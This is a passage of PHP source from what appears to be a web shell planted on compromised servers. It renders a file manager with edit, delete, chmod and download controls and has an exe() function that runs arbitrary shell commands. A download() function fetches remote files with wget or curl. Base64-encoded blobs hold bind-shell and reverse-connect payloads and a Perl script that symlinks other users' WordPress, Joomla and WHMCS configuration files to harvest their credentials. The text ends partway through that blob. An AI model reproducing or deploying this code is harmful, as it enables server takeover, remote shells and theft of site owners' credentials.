src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC\'>   $folder</a></td><td>LINK</td>\r\n\t\t\t<td style=\\"text-align:center;\\">".$owner."</td>\r\n\t\t\t<td><center>".get_perms($parent)."</center></td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td>\r\n\t\t\t<td><span id=\\"titik2\\"><a href=\\"?y=$pwd&amp;edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span>\r\n\t\t\t<form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n\t\t\t</form>\r\n\t\t\t</td></tr>";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\"><b><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==\' />     [ $folder ]</b></a>\r\n\t\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" />\r\n\t\t\t</form><td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td>\r\n\t\t\t<td><center>\r\n\t\t\t<a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form3\');\\">".get_perms($pwd.$folder)."</a>\r\n\t\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form3\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> \r\n\t\t\t<input type=\\"hidden\\" name=\\"name\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> \r\n\t\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newvalue\\" value=\\"".substr(sprintf(\'%o\', fileperms($pwd.$folder)), -4)."\\" /> \r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"chmod_folder\\" value=\\"chmod\\" /> \r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" \r\n\t\t\tonclick=\\"tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form3\');\\" /></form></center></td>\r\n\t\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;fdelete=".$pwd.$folder."\\">delete</a></td></tr>";\r\n\t\t}\r\n\t}\r\n\r\n\tforeach($fname as $file){\r\n\t\t$full = $pwd.$file;\r\n\t\tif(!$win && $posix){\r\n\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t}\r\n\t\telse {\r\n\t\t\t$owner = $user;\r\n\t\t}\t\t\r\n\t\t$buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&amp;view=$full\\"><b><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\' />   $file</b></a>\r\n\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" />\r\n\t\t</form></td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td><center>\r\n\t\t<a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form2\');\\">".get_perms($full)."</a>\r\n\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form2\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> \r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> \r\n<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newvalue\\" value=\\"".substr(sprintf(\'%o\', fileperms($full)), -4)."\\" /> \r\n<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"chmod\\" value=\\"chmod\\" /> \r\n<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form2\');\\" /></form></center></td>\r\n\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td>\r\n\t\t<td><a href=\\"?y=$pwd&amp;edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$full\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$full\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$full\\">gzip</a>)</td></tr>";\r\n\t}\r\n\t$buff .= "</table>";\r\n\treturn $buff;\r\n}\r\n\r\nfunction ukuran($file){\r\n\tif($size = @filesize($file)){\r\n\t\tif($size <= 1024) return $size;\r\n\t\telse{\r\n\t\t\tif($size <= 1024*1024) {\r\n\t\t\t\t$size = @round($size / 1024,2);;\r\n\t\t\t\treturn "$size kb";\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$size = @round($size / 1024 / 1024,2);\r\n\t\t\t\treturn "$size mb";\t\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse return "???";\r\n}\r\n\r\nfunction exe($cmd){\r\n\tif(function_exists(\'system\')) {\r\n\t\t@ob_start();\r\n\t\t@system($cmd);\r\n\t\t$buff = @ob_get_contents();\r\n\t\t@ob_end_clean();\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'exec\')) {\r\n\t\t@exec($cmd,$results);\r\n\t\t$buff = "";\r\n\t\tforeach($results as $result){\r\n\t\t\t$buff .= $result;\r\n\t\t}\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'passthru\')) {\r\n\t\t@ob_start();\r\n\t\t@passthru($cmd);\r\n\t\t$buff = @ob_get_contents();\r\n\t\t@ob_end_clean();\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'shell_exec\')){\r\n\t\t$buff = @shell_exec($cmd);\r\n\t\treturn $buff;\r\n\t}\r\n}\r\n\r\nfunction tulis($file,$text){\r\n\t$textz = gzinflate(base64_decode($text));\r\n\t if($filez = @fopen($file,"w"))\r\n\t {\r\n\t\t @fputs($filez,$textz);\r\n\t\t @fclose($file);\r\n\t }\r\n}\r\n\r\nfunction ambil($link,$file) { \r\n   if($fp = @fopen($link,"r")){\r\n\t   while(!feof($fp)) { \r\n   \t\t    $cont.= @fread($fp,1024); \r\n   \t\t} \r\n   \t\t@fclose($fp); \r\n\t   $fp2 = @fopen($file,"w"); \r\n\t   @fwrite($fp2,$cont); \r\n\t   @fclose($fp2); \r\n   }\r\n}\r\n\r\nfunction which($pr){\r\n\t$path = exe("which $pr");\r\n\tif(!empty($path)) { return trim($path); } else { return trim($pr); }\r\n}\r\n\r\nfunction download($cmd,$url){\r\n\t$namafile = basename($url);\r\n\tswitch($cmd) {\r\n\t\tcase \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break;\r\n\t\tcase \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break;\r\n\t\tcase \'wfread\' : ambil($wurl,$namafile);break;\r\n\t\tcase \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break;\r\n\t\tcase \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break;\r\n\t\tcase \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break;\r\n\t\tcase \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break;\r\n\t\tdefault: break;\r\n\t}\r\n\treturn $namafile;\r\n}\r\n\r\nfunction get_perms($file)\r\n{\r\n\tif($mode=@fileperms($file)){\r\n\t\t$perms=\'\';\r\n\t\t$perms .= ($mode & 00400) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00200) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00100) ? \'x\' : \'-\';\r\n\t\t$perms .= ($mode & 00040) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00020) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00010) ? \'x\' : \'-\';\r\n\t\t$perms .= ($mode & 00004) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00002) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00001) ? \'x\' : \'-\';\r\n\t\treturn $perms;\r\n\t}\r\n\telse return "??????????";\r\n}\r\n\r\nfunction clearspace($text){\r\n\treturn str_replace(" ","_",$text);\r\n}\r\n\r\n// net tools\r\n$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf\r\n+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE\r\nP/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ\r\ndKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL\r\n3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug\r\nUq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk\r\nHDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W\r\ntyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL\r\nZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6\r\nuPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";\r\n$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1\r\nNmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg\r\ntNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD\r\ne/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0\r\nLSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo\r\nvaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB\r\n+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";\r\n$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St\r\nktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j\r\nS2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ\r\nja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw\r\nTskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";\r\n$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA\r\nBYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95\r\nzzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75\r\ni+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A\r\nRkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY\r\njwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F\r\n6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";\r\n//confshell\r\n$configshell = \'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGlu